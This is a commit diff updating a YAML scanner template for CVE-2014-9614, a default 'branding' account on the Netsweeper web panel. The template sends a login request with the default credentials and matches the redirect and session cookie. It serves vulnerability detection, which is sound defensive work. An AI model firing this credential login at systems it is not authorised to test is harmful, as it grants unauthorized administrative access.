Update CVE-2014-9614.yaml

cves/2014/CVE-2014-9614.yaml

@@ -3,15 +3,17 @@ id: CVE-2014-9614
 info:
   name: Netsweeper 4.0.5 - Default Weak Account
   author: daffainfo
-  severity: medium
-  reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
-  tags: cve,cve2021,netsweeper
+  severity: critical
+  description: The Web Panel in Netsweeper before 4.0.5 has a default password of branding for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/.
+  reference:
+    - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-9614
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.80
     cve-id: CVE-2014-9614
     cwe-id: CWE-798
-  description: "The Web Panel in Netsweeper before 4.0.5 has a default password of branding for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/."
+  tags: cve,cve2021,netsweeper,default-login
 
 requests:
   - raw:
@@ -20,18 +22,23 @@ requests:
         Host: {{Hostname}}
         Origin: {{BaseURL}}
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-
+        Referer: {{BaseURL}}/webadmin/start/
         login=branding&password=branding&Submit=Login
 
-    cookie-reuse: true
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 302
+
       - type: word
+        part: header
         words:
           - 'Location: ../common/'
-          - 'Set-Cookie: webadminU='
+          - 'Location: ../start/'
+        condition: or
+
+      - type: word
         part: header
-        condition: and
+        words:
+          - 'Set-Cookie: webadminU='